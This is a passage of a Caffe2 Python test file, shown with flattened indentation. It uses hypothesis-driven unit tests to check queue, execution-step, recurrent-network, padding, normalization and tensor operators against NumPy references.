ys = [np.vstack([self.ws.blobs["y_{}_{}".format(i, n)].fetch()
for n in range(num_elements)])
for i in range(num_blobs)]
for i in range(num_blobs):
self.assertEqual(ys[i].shape, xs[i].shape)
for j in range(num_elements):
# Verify that the rows of the returned blob are a
# permutation. The order may be different due to
# different threads racing.
self.assertTrue(
any(np.array_equal(xs[i][j], ys[i][k])
for k in range(num_elements)))
@given(num_producers=st.integers(1, 10),
num_consumers=st.integers(1, 10),
capacity=st.integers(1, 5),
num_blobs=st.integers(1, 3),
do=st.sampled_from(hu.device_options))
def test_safe_blobs_queue(self, num_producers, num_consumers,
capacity, num_blobs, do):
init_net = core.Net('init_net')
queue = init_net.CreateBlobsQueue(
[], 1, capacity=capacity, num_blobs=num_blobs)
producer_steps = []
truth = 0
for i in range(num_producers):
name = 'producer_%d' % i
net = core.Net(name)
blobs = [net.ConstantFill([], 1, value=1.0, run_once=False)
for times in range(num_blobs)]
status = net.NextName()
net.SafeEnqueueBlobs([queue] + blobs, blobs + [status])
count = (i + 1) * 10
step = core.execution_step(name, net, num_iter=count)
truth += count
producer_steps.append(step)
producer_exit_net = core.Net('producer_exit_net')
producer_exit_net.CloseBlobsQueue([queue], 0)
producer_step = core.execution_step('producer', [
core.execution_step(
'producers', producer_steps, concurrent_substeps=True),
core.execution_step('producer_exit', producer_exit_net)]
)
consumer_steps = []
counters = []
const_1 = init_net.ConstantFill([], 1, value=1.0)
for i in range(num_consumers):
name = 'consumer_%d' % i
net1 = core.Net(name)
blobs = net1.SafeDequeueBlobs([queue], num_blobs + 1)
status = blobs[-1]
net2 = core.Net(name + '_counter')
counter = init_net.ConstantFill([], 1, value=0.0)
counters.append(counter)
net2.Add([counter, const_1], counter)
consumer_steps.append(core.execution_step(
name, [net1, net2], should_stop_blob=status))
consumer_step = core.execution_step(
'consumer', consumer_steps, concurrent_substeps=True)
init_step = core.execution_step('init', init_net)
worker_step = core.execution_step(
'worker', [consumer_step, producer_step], concurrent_substeps=True)
plan = core.Plan('test')
plan.AddStep(init_step)
plan.AddStep(worker_step)
self.ws.run(plan)
v = 0
for counter in counters:
v += self.ws.blobs[str(counter)].fetch().tolist()
self.assertEqual(v, truth)
@given(num_queues=st.integers(1, 5),
num_iter=st.integers(5, 10),
capacity=st.integers(1, 5),
num_blobs=st.integers(1, 3))
def test_weighted_sample_blobs_queue(
self, num_queues, num_iter, capacity, num_blobs
):
# Create BlobsQueue for each input queue
print("num_queues", num_queues)
init_net = core.Net('init_net')
queues = [
init_net.CreateBlobsQueue(
[], 1, capacity=capacity, num_blobs=num_blobs
) for _ in range(num_queues)
]
# Create multiple producer nets and one producer exist net
producer_steps = []
producer_exit_nets = []
for i in range(num_queues):
name = 'producer_%d' % i
net = core.Net(name)
blobs = [net.ConstantFill([], 1, value=1.0, run_once=False)
for _ in range(num_blobs)]
status = net.NextName()
net.SafeEnqueueBlobs([queues[i]] + blobs, blobs + [status])
exit_net = core.Net('producer_exit_%d' % i)
exit_net.CloseBlobsQueue(queues[i], 0)
producer_exit_nets.append(exit_net)
step = core.execution_step(
name, [
core.execution_step(
'producer_%d' % i, [net], num_iter=num_iter
),
core.execution_step('producer_exit_%d' % i, [exit_net]),
]
)
producer_steps.append(step)
producer_step = core.execution_step(
'producer', [
core.execution_step(
'producers',
producer_steps,
concurrent_substeps=True,
),
]
)
status_lst = []
def append(ins, outs):
status_lst.append(ins)
# Create one consumer dequeue net and one consumer exist net
consumer_net = core.Net('weight_sample_dequeue_net')
blobs = consumer_net.WeightedSampleDequeueBlobs(
queues,
num_blobs + 1,
weights=np.random.uniform(low=0.0, high=1.0, size=(num_queues,))
)
status = blobs[-1]
consumer_net.Python(append)(status)
consumer_step = core.execution_step(
'consumer',
[
core.execution_step(
'consumer', [consumer_net], should_stop_blob=status
),
core.execution_step('producer_exit', producer_exit_nets)
]
)
init_step = core.execution_step('init', init_net)
worker_step = core.execution_step(
'worker', [producer_step, consumer_step], concurrent_substeps=True)
plan = core.Plan('test')
plan.AddStep(init_step)
plan.AddStep(worker_step)
self.ws.run(plan)
assert len(status_lst) >= num_iter + 1
assert len(status_lst) <= num_iter * num_queues + 1
@given(
data=hu.tensor(),
**hu.gcs_cpu_only)
def test_squeeze_expand_dims(self, data, gc, dc):
dims = [0, 0]
if len(data.shape) > 2:
dims.append(2)
op = core.CreateOperator(
"ExpandDims",
["data"],
["expanded"],
dims=dims)
def expand_dims_ref(data, *args, **kw):
inc_dims = list(set(dims))
inc_dims.sort()
r = data
for dim in inc_dims:
r = np.expand_dims(r, axis=dim)
return (r, )
def squeeze_ref(data, *args, **kw):
dec_dims = list(set(dims))
dec_dims.sort(reverse=True)
r = data
for dim in dec_dims:
r = np.squeeze(r, axis=dim)
return (r, )
self.assertReferenceChecks(
device_option=gc,
op=op,
inputs=[data],
reference=expand_dims_ref,
output_to_grad='expanded',
grad_reference=squeeze_ref)
@given(**hu.gcs_cpu_only)
def test_tt_layer(self, gc, dc):
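        # TT is the Tensor-Train factorized fully-connected layer: the weight matrix
        # is represented as a chain of small cores whose shapes are determined by
        # inp_sizes, out_sizes and tt_ranks, which drastically reduces parameter count.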
seed = 1234
np.random.seed(seed)
inp_sizes = [2, 2, 2, 2]
out_sizes = [2, 2, 2, 2]
tt_ranks = [1, 3, 3, 3, 1]
op = core.CreateOperator(
"TT",
["X", "b", "cores"],
["Y"],
inp_sizes=inp_sizes,
out_sizes=out_sizes,
tt_ranks=tt_ranks,
)
X = np.expand_dims(
np.random.rand(16).astype(np.float32), axis=0)
b = np.array([0] * 16).astype(np.float32)
cores = tt_core.init_tt_cores(inp_sizes, out_sizes, tt_ranks)
self.ws.create_blob("X").feed(X)
self.ws.create_blob("b").feed(b)
self.ws.create_blob("cores").feed(cores)
self.ws.run(op)
Y = self.ws.blobs[("Y")].fetch()
Y = Y.reshape([16])
golden = np.array([-9.51763490e-07, -1.28442286e-06,
-2.86281141e-07, 2.28865644e-07,
-1.96180017e-06, -1.78920531e-06,
9.31094666e-07, -2.04273989e-07,
1.70017107e-06, 1.64845711e-06,
-1.06099132e-06, -4.69111137e-07,
6.57552358e-08, -1.28942040e-08,
-2.29114004e-07, -1.04262714e-06])
# This golden array is dependent on the specified inp_sizes, out_sizes,
# tt_ranks, and seed. Changing these will cause the test to fail.
self.assertAlmostEqual(np.linalg.norm(golden - Y), 0, delta=1e-10)
@given(num_workers=st.integers(1, 10),
net_type=st.sampled_from(
["simple", "dag"] +
(["async_dag"] if workspace.has_gpu_support else [])),
do=st.sampled_from(hu.device_options))
def test_dag_net_forking(self, net_type, num_workers, do):
from caffe2.python.model_helper import ModelHelper
from caffe2.python import brew
m = ModelHelper(name="test_model")
n = 10
d = 2
depth = 2
iters = 5
np.random.seed(1701)
# Build a binary tree of FC layers, summing at each node.
for i in reversed(range(depth)):
for j in range(2 ** i):
bottom_1 = "{}_{}".format(i + 1, 2 * j)
bottom_2 = "{}_{}".format(i + 1, 2 * j + 1)
mid_1 = "{}_{}_m".format(i + 1, 2 * j)
mid_2 = "{}_{}_m".format(i + 1, 2 * j + 1)
top = "{}_{}".format(i, j)
brew.fc(
m,
bottom_1, mid_1,
dim_in=d, dim_out=d,
weight_init=('ConstantFill', dict(value=np.random.randn())),
bias_init=('ConstantFill', dict(value=np.random.randn())))
brew.fc(
m,
bottom_2, mid_2,
dim_in=d, dim_out=d,
weight_init=('ConstantFill', dict(value=np.random.randn())),
bias_init=('ConstantFill', dict(value=np.random.randn())))
m.net.Sum([mid_1, mid_2], top)
m.net.SquaredL2Distance(["0_0", "label"], "xent")
m.net.AveragedLoss("xent", "loss")
input_to_grad = m.AddGradientOperators(["loss"])
m.Proto().device_option.CopyFrom(do)
m.param_init_net.Proto().device_option.CopyFrom(do)
m.Proto().type = net_type
m.Proto().num_workers = num_workers
self.ws.run(m.param_init_net)
print(str(m.Proto()))
def run():
import numpy as np
np.random.seed(1701)
input_blobs = ["{}_{}".format(depth, j) for j in range(2 ** depth)]
for input_blob in input_blobs:
self.ws.create_blob(input_blob).feed(
np.random.randn(n, d).astype(np.float32),
device_option=do)
self.ws.create_blob("label").feed(
np.random.randn(n, d).astype(np.float32),
device_option=do)
self.ws.run(m.net)
gradients = [
self.ws.blobs[str(input_to_grad[input_blob])].fetch()
for input_blob in input_blobs]
return gradients
outputs = [run() for _ in range(iters)]
for output in outputs[1:]:
np.testing.assert_array_equal(outputs[0], output)
self.assertAlmostEqual(np.sum(np.square(output)), 91.81752,
delta=1e-2)
@given(input=hu.tensor(min_dim=2, max_dim=6, dtype=np.int32,
elements=st.integers(min_value=0,
max_value=2**32 - 1)),
slice_dim=st.integers(),
a=st.integers(),
b=st.integers(),
is_empty=st.booleans(),
**hu.gcs_cpu_only)
def test_slice(self, input, slice_dim, a, b, is_empty, gc, dc):
slice_dim = slice_dim % len(input.shape)
if (is_empty):
input = np.random.rand(*([0] + list(input.shape))).astype(np.int32)
slice_dim += 1
a = a % input.shape[slice_dim]
b = b % input.shape[slice_dim] + 1
start_vec = np.zeros(len(input.shape), dtype=np.int32)
end_vec = np.ones(len(input.shape), dtype=np.int32) * -1
start_vec[slice_dim] = min(a, b)
end_vec[slice_dim] = max(a, b)
op = core.CreateOperator(
"Slice",
["input", "start", "end"],
["output"])
def slice_ref(x, s, e):
if len(s.shape) == 0:
return x
            # Index with a tuple of slices; indexing with a list of slices is
            # deprecated in newer NumPy versions.
            slc = tuple(slice(si, None if ei == -1 else ei) for si, ei in zip(s, e))
            return (x[slc], )
self.assertReferenceChecks(gc, op, [input, start_vec, end_vec],
slice_ref)
@given(data=hu.tensor(), **hu.gcs_cpu_only)
def test_shape(self, data, gc, dc):
op = core.CreateOperator("Shape", ["data"], ["shape"])
self.assertReferenceChecks(gc, op, [data], lambda x: (x.shape, ))
@given(data=hu.tensor(), **hu.gcs_cpu_only)
def test_has_elements(self, data, gc, dc):
op = core.CreateOperator("HasElements", ["data"], ["has_elements"])
self.assertReferenceChecks(gc, op, [data], lambda x: (len(x) > 0, ))
op = core.CreateOperator("IsEmpty", ["data"], ["is_empty"])
self.assertReferenceChecks(gc, op, [data], lambda x: (len(x) == 0, ))
@given(initial_iters=st.integers(0, 100),
max_iters=st.integers(0, 100))
def test_should_stop_as_criteria_net_execution_step(
self, initial_iters, max_iters):
net = core.Net("net")
net.Iter(["iter"], ["iter"])
self.ws.create_blob("iter").feed(
np.asarray([initial_iters]).astype(np.int64))
self.ws.create_blob("num_iters").feed(
np.asarray([max_iters]).astype(np.int64))
criteria_net = core.Net("criteria")
criteria_net.GE(["iter", "num_iters"], ["stop"])
criteria_net.Proto().external_output.extend(["stop"])
plan = core.Plan('plan')
plan.AddStep(core.execution_step(
'step', [criteria_net, net],
should_stop_blob=core.BlobReference("stop")))
self.ws.run(plan)
iters = self.ws.blobs[("iter")].fetch()
self.assertEqual(iters.dtype, np.int64)
self.assertEqual(iters[0], max(initial_iters, max_iters))
def test_disabled_execution_step(self):
def createNets(i, disabled):
should_stop = 'should_stop_{}'.format(i)
output = 'output_{}'.format(i)
# init content and stop signal
init = core.Net("init_{}".format(i))
init.ConstantFill(
[],
[output],
shape=[1],
value=0.0
)
init.Cast([output], [should_stop], to='bool')
# decide if disabled or not
criterion = core.Net("criterion_{}".format(i))
tmp = criterion.ConstantFill(
[],
shape=[1],
value=1.0 if disabled else 0.0
)
criterion.Cast([tmp], [should_stop], to='bool')
criterion.Proto().external_output.extend([should_stop])
# the body net is just to turn a 0 blob to 1
net = core.Net("net_{}".format(i))
net.ConstantFill(
[],
[output],
shape=[1],
value=1.0
)
# always end the loop
ender = core.Net("ender_{}".format(i))
tmp = ender.ConstantFill(
[],
shape=[1],
value=1.0
)
ender.Cast([tmp], [should_stop], to='bool')
ender.Proto().external_output.extend([should_stop])
return [init, criterion, net, ender]
nets = [createNets(1, False),
createNets(2, True),
createNets(3, False)]
steps = [
core.execution_step(
'step_1', nets[0],
should_stop_blob=core.BlobReference('should_stop_1')),
core.execution_step(
'step_2', nets[1],
should_stop_blob=core.BlobReference('should_stop_2')),
core.execution_step('step_3', nets[2])
]
expected = [1.0, 0.0, 1.0]
plan = core.Plan('plan')
plan.AddStep(core.execution_step('all_steps', steps, num_iter=3))
self.ws.run(plan)
for i, _ in enumerate(nets):
self.assertEqual(
self.ws.blobs['output_{}'.format(i + 1)].fetch()[0],
expected[i])
@given(initial_iters=st.integers(0, 100),
num_iters=st.integers(0, 100))
def test_iter_count_with_execution_step(self, initial_iters, num_iters):
net = core.Net("net")
net.Iter(["iter"], ["iter"])
self.ws.create_blob("iter").feed(
np.asarray([initial_iters]).astype(np.int64))
step = core.ExecutionStep("step", [net])
step.SetIter(num_iters)
plan = core.Plan("plan")
plan.AddStep(step)
self.ws.run(plan)
iters = self.ws.blobs[("iter")].fetch()
self.assertEqual(iters.dtype, np.int64)
self.assertEqual(iters[0], initial_iters + num_iters)
@given(initial_iters=st.integers(0, 100),
num_iters=st.integers(0, 100),
num_nets=st.integers(0, 5))
def test_atomic_iter_with_concurrent_steps(self, initial_iters, num_iters,
num_nets):
init_net = core.Net("init_net")
iter_mutex = init_net.CreateMutex([], ["iter_mutex"])
self.ws.create_blob("iter").feed(
np.asarray([initial_iters]).astype(np.int64))
concurrent_steps = core.ExecutionStep("concurrent_steps",
num_iter=num_iters)
for i in range(num_nets):
net = core.Net("net_{}".format(i))
net.AtomicIter([iter_mutex, "iter"], ["iter"])
step = core.ExecutionStep("step", [net])
concurrent_steps.AddSubstep(step)
concurrent_steps.SetConcurrentSubsteps(True)
plan = core.Plan("plan")
plan.AddStep(concurrent_steps)
self.ws.run(init_net)
self.ws.run(plan)
iters = self.ws.blobs[("iter")].fetch()
self.assertEqual(iters.dtype, np.int64)
self.assertEqual(iters[0], initial_iters + num_iters * num_nets)
@given(a=hu.tensor(),
src=st.sampled_from(list(viewkeys(_NUMPY_TYPE_TO_ENUM))),
dst=st.sampled_from(list(viewkeys(_NUMPY_TYPE_TO_ENUM))),
use_name=st.booleans(),
**hu.gcs)
def test_cast(self, a, src, dst, use_name, gc, dc):
a = a.astype(src)
# Casting from a float type outside the range of the integral
# type is UB.
ftypes = [np.float32, np.float64]
if src in ftypes and dst not in ftypes and dst is not np.bool:
info = np.iinfo(dst)
a = np.clip(a, info.min, info.max)
def ref(data):
return [data.astype(dst)]
to = _NUMPY_TYPE_TO_ENUM[dst]
if use_name:
to = TensorProto.DataType.Name(to).lower()
op = core.CreateOperator('Cast', ["X"], ["Y"], to=to)
self.assertDeviceChecks(dc, op, [a], [0])
out, = self.assertReferenceChecks(gc, op, [a], ref)
self.assertEqual(dst, out.dtype)
@given(a=hu.tensor(),
eps=st.floats(min_value=1e-4, max_value=1e-2),
**hu.gcs_cpu_only)
def test_logit(self, a, eps, gc, dc):
def ref(data):
data = np.clip(data, eps, 1.0 - eps)
return (np.log(data / (1 - data)), )
op = core.CreateOperator('Logit', ["X"], ["Y"], eps=eps)
self.assertDeviceChecks(dc, op, [a], [0])
self.assertReferenceChecks(gc, op, [a], ref)
@given(a=hu.tensor(elements=st.floats(allow_nan=True)),
value=st.floats(min_value=-10, max_value=10),
**hu.gcs_cpu_only)
def test_replace_nan(self, a, value, gc, dc):
def ref(data):
out = np.copy(data)
out[np.isnan(data)] = value
return (out, )
op = core.CreateOperator('ReplaceNaN', ["X"], ["Y"], value=value)
self.assertDeviceChecks(dc, op, [a], [0])
self.assertReferenceChecks(gc, op, [a], ref)
@given(data=_dtypes(dtypes=[np.int32, np.int64, np.float32, np.bool]).
flatmap(lambda dtype: hu.tensor(
min_dim=1, dtype=dtype, elements=hu.elements_of_type(dtype))),
has_input=st.booleans(),
has_extra_shape=st.booleans(),
extra_shape=st.lists(
min_size=1, max_size=5, elements=st.integers(1, 5)),
**hu.gcs)
def test_constant_fill(self, data, has_input, has_extra_shape, extra_shape,
gc, dc):
dtype = data.dtype.type
# in opt mode, np.bool is converted into np.bool_
if data.dtype == np.dtype(np.bool):
dtype = np.bool
value = data.item(0)
gt_shape = data.shape
inputs = [data]
enum_type = _NUMPY_TYPE_TO_ENUM[dtype]
if has_input:
if has_extra_shape:
op = core.CreateOperator('ConstantFill', ["X"], ["Y"],
dtype=enum_type,
extra_shape=extra_shape,
value=value)
gt_shape += tuple(extra_shape)
else:
op = core.CreateOperator('ConstantFill', ["X"], ["Y"],
dtype=enum_type,
value=value)
else:
op = core.CreateOperator('ConstantFill', [], ["Y"],
dtype=enum_type,
value=value,
shape=list(gt_shape))
inputs = []
def ref(inputs=None):
outputs = np.full(shape=gt_shape, fill_value=value, dtype=dtype)
return [outputs]
self.assertDeviceChecks(dc, op, inputs, [0])
out, = self.assertReferenceChecks(gc, op, inputs, ref)
self.assertEqual(dtype, out.dtype)
@given(t=st.integers(1, 5),
n=st.integers(1, 5),
d=st.integers(1, 5))
def test_elman_recurrent_network(self, t, n, d):
from caffe2.python import model_helper, brew
np.random.seed(1701)
step_net = model_helper.ModelHelper(name="Elman")
# TODO: name scope external inputs and outputs
step_net.Proto().external_input.extend(
["input_t", "seq_lengths", "timestep",
"hidden_t_prev", "gates_t_w", "gates_t_b"])
step_net.Proto().type = "simple"
step_net.Proto().external_output.extend(["hidden_t", "gates_t"])
brew.fc(step_net,
"hidden_t_prev", "gates_t", dim_in=d, dim_out=d, axis=2)
step_net.net.Sum(["gates_t", "input_t"], ["gates_t"])
step_net.net.Sigmoid(["gates_t"], ["hidden_t"])
# Initialize params for step net in the parent net
for op in step_net.param_init_net.Proto().op:
workspace.RunOperatorOnce(op)
backward_ops, backward_mapping = core.GradientRegistry.GetBackwardPass(
step_net.Proto().op, {"hidden_t": "hidden_t_grad"})
backward_mapping = {
str(k): str(v) for k, v in viewitems(backward_mapping)
}
backward_step_net = core.Net("ElmanBackward")
del backward_step_net.Proto().op[:]
backward_step_net.Proto().op.extend(backward_ops)
assert backward_mapping["input_t"] == "gates_t_grad"
links = [
("hidden_t_prev", "hidden", 0),
("hidden_t", "hidden", 1),
("input_t", "input", 0),
]
link_internal, link_external, link_offset = zip(*links)
backward_links = [
("hidden_t_prev_grad", "hidden_grad", 0),
("hidden_t_grad", "hidden_grad", 1),
("gates_t_grad", "input_grad", 0),
]
backward_link_internal, backward_link_external, backward_link_offset = \
zip(*backward_links)
backward_step_net.Proto().external_input.extend(["hidden_t_grad"])
backward_step_net.Proto().external_input.extend(
step_net.Proto().external_input)
backward_step_net.Proto().external_input.extend(
step_net.Proto().external_output)
inputs = ["input", "seq_lengths", "gates_t_w", "gates_t_b", "hidden_input"]
recurrent_inputs = ["hidden_input"]
op = core.CreateOperator(
"RecurrentNetwork",
inputs,
["output", "hidden", "hidden_output", "step_workspaces"],
alias_src=["hidden", "hidden"],
alias_dst=["output", "hidden_output"],
alias_offset=[1, -1],
recurrent_states=["hidden"],
initial_recurrent_state_ids=[
inputs.index(i) for i in recurrent_inputs
],
link_internal=link_internal,
link_external=link_external,
link_offset=link_offset,
backward_link_internal=backward_link_internal,
backward_link_external=backward_link_external,
backward_link_offset=backward_link_offset,
param=[inputs.index(p) for p in step_net.params],
step_net=str(step_net.Proto()),
backward_step_net=str(backward_step_net.Proto()),
outputs_with_grads=[0],
)
workspace.FeedBlob(
"input", np.random.randn(t, n, d).astype(np.float32))
workspace.FeedBlob(
"hidden_input", np.random.randn(1, n, d).astype(np.float32))
workspace.FeedBlob(
"seq_lengths", np.random.randint(0, t, size=(n,)).astype(np.int32))
def reference(input, seq_lengths, gates_w, gates_b, hidden_input):
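            # NumPy reference for the Elman recurrence:
            #   h_t = sigmoid(h_{t-1} . W^T + x_t), with h_0 = hidden_input.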
T = input.shape[0]
N = input.shape[1]
D = input.shape[2]
hidden = np.zeros(shape=(T + 1, N, D))
assert hidden.shape[0] == T + 1
assert hidden.shape[1] == N
assert hidden.shape[2] == D
hidden[0, :, :] = hidden_input
for t in range(T):
input_t = input[t].reshape(1, N, D)
hidden_t_prev = hidden[t].reshape(1, N, D)
gates = np.dot(hidden_t_prev, gates_w.T)
gates = gates.reshape(1, N, D) + input_t.reshape(1, N, D)
hidden[t + 1] = sigmoid(gates)
return hidden[1:], hidden, hidden[-1].reshape(1, N, D)
self.assertReferenceChecks(
hu.cpu_do,
op,
[workspace.FetchBlob(name)
for name in ["input", "seq_lengths", "gates_t_w", "gates_t_b",
"hidden_input"]],
reference,
outputs_to_check=[0, 1, 2])
for param in [0, 2, 3]:
self.assertGradientChecks(
hu.cpu_do,
op,
[workspace.FetchBlob(name)
for name in ["input", "seq_lengths", "gates_t_w", "gates_t_b",
"hidden_input"]],
param,
[0])
@given(n=st.integers(1, 5),
c=st.integers(1, 5),
h=st.integers(1, 5),
w=st.integers(1, 5),
pad=st.integers(0, 2),
block_size=st.integers(2, 3),
**hu.gcs)
def test_space_to_batch(self, n, c, h, w, pad, block_size, gc, dc):
assume((h + 2 * pad) % block_size == 0)
assume((w + 2 * pad) % block_size == 0)
X = np.random.randn(n, c, h, w).astype(np.float32)
op = core.CreateOperator("SpaceToBatch", ["X"], ["Y"],
pad=pad, block_size=block_size)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(n=st.integers(1, 5),
c=st.integers(1, 5),
h=st.integers(1, 5),
w=st.integers(1, 5),
pad=st.integers(0, 2),
block_size=st.integers(2, 3),
**hu.gcs)
def test_batch_to_space(self, n, c, h, w, pad, block_size, gc, dc):
assume((h + 2 * pad) % block_size == 0)
assume((w + 2 * pad) % block_size == 0)
X = np.random.randn(
n * block_size * block_size,
c,
(h + 2 * pad) // block_size,
(w + 2 * pad) // block_size).astype(np.float32)
op = core.CreateOperator("BatchToSpace", ["X"], ["Y"],
pad=pad, block_size=block_size)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(X=hu.tensor(),
in_place=st.booleans(),
scale=st.floats(min_value=-2.0, max_value=2.0),
**hu.gcs)
def test_scale(self, X, in_place, scale, gc, dc):
op = core.CreateOperator(
"Scale", ["X"], ["Y" if not in_place else "X"],
scale=scale)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(s=st.text())
def test_string_serde(self, s):
s = s.encode('ascii', 'ignore')
self.ws.create_blob("a").feed(s)
serialized = self.ws.blobs["a"].serialize("a")
self.ws.create_blob("b").deserialize(serialized)
self.assertEqual(s, self.ws.blobs[("a")].fetch())
self.assertEqual(s, self.ws.blobs[("b")].fetch())
@given(n=st.integers(1, 3),
dim=st.integers(4, 16),
**hu.gcs)
def test_distances(self, n, dim, gc, dc):
X = np.random.uniform(-1, 1, (n, dim)).astype(np.float32)
Y = np.random.uniform(-1, 1, (n, dim)).astype(np.float32)
self.ws.create_blob("X").feed(X)
self.ws.create_blob("Y").feed(Y)
def check_grad(op):
self.assertGradientChecks(gc, op, [X, Y], 0, [0],
stepsize=1e-2, threshold=1e-2)
self.assertGradientChecks(gc, op, [X, Y], 1, [0],
stepsize=1e-2, threshold=1e-2)
l2_op = core.CreateOperator("SquaredL2Distance",
["X", "Y"], ["l2_dist"])
self.ws.run(l2_op)
np.testing.assert_allclose(self.ws.blobs[("l2_dist")].fetch(),
np.square(X - Y).sum(axis=1) * 0.5,
rtol=1e-4, atol=1e-4)
check_grad(l2_op)
if gc.device_type == 1:
# Only SquaredL2Distance has CUDA implementation
return
dot_op = core.CreateOperator("DotProduct", ["X", "Y"], ["dot"])
self.ws.run(dot_op)
np.testing.assert_allclose(self.ws.blobs[("dot")].fetch(),
np.multiply(X, Y).sum(axis=1),
rtol=1e-4, atol=1e-4)
check_grad(dot_op)
kEps = 1e-12
cos_op = core.CreateOperator("CosineSimilarity", ["X", "Y"], ["cos"])
self.ws.run(cos_op)
cos = np.divide(np.multiply(X, Y).sum(axis=1),
np.multiply(np.linalg.norm(X, axis=1) + kEps,
np.linalg.norm(Y, axis=1) + kEps))
np.testing.assert_allclose(self.ws.blobs[("cos")].fetch(), cos,
rtol=1e-4, atol=1e-4)
check_grad(cos_op)
@given(pad=st.integers(0, 3),
size=st.integers(1, 10),
input_channels=st.integers(1, 5),
batch_size=st.integers(1, 5),
order=st.sampled_from(["NCHW", "NHWC"]),
mode=st.sampled_from(["constant", "reflect", "edge"]),
**hu.gcs)
def test_same_pad_image(self, pad, size, input_channels, batch_size, order,
mode, gc, dc):
assume(size > pad)
op = core.CreateOperator(
"PadImage",
["X"],
["Y"],
pad=pad,
mode=mode,
order=order,
)
if order == "NHWC":
X = np.random.rand(
batch_size, size, size, input_channels).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (pad, pad), (pad, pad), (0, 0)), mode),)
else:
X = np.random.rand(
batch_size, input_channels, size, size).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (0, 0), (pad, pad), (pad, pad)), mode),)
self.assertReferenceChecks(gc, op, [X], numpy_pad_ref)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(pad_t=st.integers(0, 3),
pad_l=st.integers(0, 3),
pad_b=st.integers(0, 3),
pad_r=st.integers(0, 3),
size=st.integers(1, 10),
input_channels=st.integers(1, 5),
batch_size=st.integers(1, 5),
order=st.sampled_from(["NCHW", "NHWC"]),
mode=st.sampled_from(["constant", "reflect", "edge"]),
**hu.gcs)
def test_pad_image(self, pad_t, pad_l, pad_b, pad_r, size, input_channels,
batch_size, order, mode, gc, dc):
assume(size > max(pad_b, pad_r, pad_t, pad_l))
op = core.CreateOperator(
"PadImage",
["X"],
["Y"],
pad_t=pad_t,
pad_l=pad_l,
pad_b=pad_b,
pad_r=pad_r,
mode=mode,
order=order,
)
if order == "NHWC":
X = np.random.rand(
batch_size, size, size, input_channels).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (pad_t, pad_b), (pad_l, pad_r), (0, 0)),
mode),)
else:
X = np.random.rand(
batch_size, input_channels, size, size).astype(np.float32) - 0.5
def numpy_pad_ref(x):
return (np.pad(
x, ((0, 0), (0, 0), (pad_t, pad_b), (pad_l, pad_r)),
mode),)
self.assertReferenceChecks(gc, op, [X], numpy_pad_ref)
self.assertDeviceChecks(dc, op, [X], [0])
self.assertGradientChecks(gc, op, [X], 0, [0])
@given(size=st.integers(7, 10),
input_channels=st.integers(1, 10),
batch_size=st.integers(1, 3),
order=st.sampled_from(["NCHW", "NHWC"]),
epsilon=st.floats(min_value=1e-4, max_value=1e-2),
**hu.gcs_cpu_only)
def test_instance_norm(self, size, input_channels, batch_size, order,
epsilon, gc, dc):
op = core.CreateOperator(
"InstanceNorm",
["X", "scale", "bias"],
["Y"],
order=order,
epsilon=epsilon,
)
np.random.seed(1701)
scale = np.random.rand(input_channels).astype(np.float32) + 0.5
bias = np.random.rand(input_channels).astype(np.float32) - 0.5
X = np.random.rand(
batch_size, input_channels, size, size).astype(np.float32) - 0.5
if order == "NHWC":
X = X.swapaxes(1, 2).swapaxes(2, 3)
def ref_nchw(x, scale, bias):
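            # Instance normalization: normalize each (sample, channel) slice over its
            # spatial dimensions, then apply the per-channel scale and bias.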
x = x.reshape(batch_size * input_channels, size * size)
y = (x - x.mean(1)[:, np.newaxis])
y /= np.sqrt(x.var(1) + epsilon)[:, np.newaxis]
y = y.reshape(batch_size, input_channels, size, size)
y = y * scale.reshape(1, input_channels, 1, 1)
y = y + bias.reshape(1, input_channels, 1, 1)
return (y, )
def ref_nhwc(x, scale, bias):
x = x.swapaxes(2, 3).swapaxes(1, 2)
y = ref_nchw(x, scale, bias)[0]
return (y.swapaxes(1, 2).swapaxes(2, 3), )
self.assertReferenceChecks(
gc, op, [X, scale, bias],
ref_nchw if order == "NCHW" else ref_nhwc)
# TODO(jiayq): when there are backward and GPU implementations, enable
# these two.
# self.assertDeviceChecks(dc, op, [X, scale, bias], [0])
# self.assertGradientChecks(gc, op, [X, scale, bias], 0, [0])
ws = workspace.C.Workspace()
feeds = [("X", X), ("scale", scale), ("bias", bias)]
for blob, arr in feeds:
ws.create_blob(blob).feed(arr)
for _ in range(100):
ws.run(op)
for blob, arr in feeds:
np.testing.assert_array_equal(ws.blobs[blob].fetch(), arr)
@given(sizes=st.lists(st.integers(1, 100), min_size=1),
in_place=st.booleans(),
**hu.gcs)
def test_unsafe_coalesce(self, sizes, in_place, gc, dc):
gAlignment = 32
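        # UnsafeCoalesce packs all inputs into one contiguous "coalesced" byte blob;
        # the reference below mirrors that by padding each tensor to a
        # gAlignment-byte boundary before concatenating the raw bytes.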
Xs = [np.random.randn(size)
.astype(np.random.choice([np.float32, np.float64, np.uint8]))
for size in sizes]
op = core.CreateOperator(
"UnsafeCoalesce",
["X_{}".format(i) for i, _ in enumerate(sizes)],
[("X_{}" if in_place else "Y_{}").format(i)
for i, _ in enumerate(sizes)] + ["coalesced"])
self.assertDeviceChecks(dc, op, Xs, list(range(len(sizes) + 1)))
def unsafe_coalesce(*xs):
def to_uint8(x):
x_aligned_bytes = ((x.nbytes + gAlignment - 1) // gAlignment) \
* gAlignment
x_aligned = np.zeros(
shape=(x_aligned_bytes // x.dtype.itemsize, ),
dtype=x.dtype)
x_aligned[:x.size] = x
                # np.fromstring is deprecated for binary data; frombuffer is the
                # supported equivalent.
                x_cast = np.frombuffer(x_aligned.tobytes(), dtype='<u1')
return x_cast
flat = [to_uint8(x) for x in xs]
coalesced = np.concatenate(flat)
return list(xs) + [coalesced]
self.assertReferenceChecks(gc, op, Xs, unsafe_coalesce)
@given(inp=_dtypes().flatmap(lambda dt: _tensor_and_indices(
elements=st.floats(min_value=0, max_value=1), dtype=dt)),
**hu.gcs_cpu_only)
def test_sparse_to_dense(self, inp, gc, dc):
first_dim, X, I = inp
# values don't matter
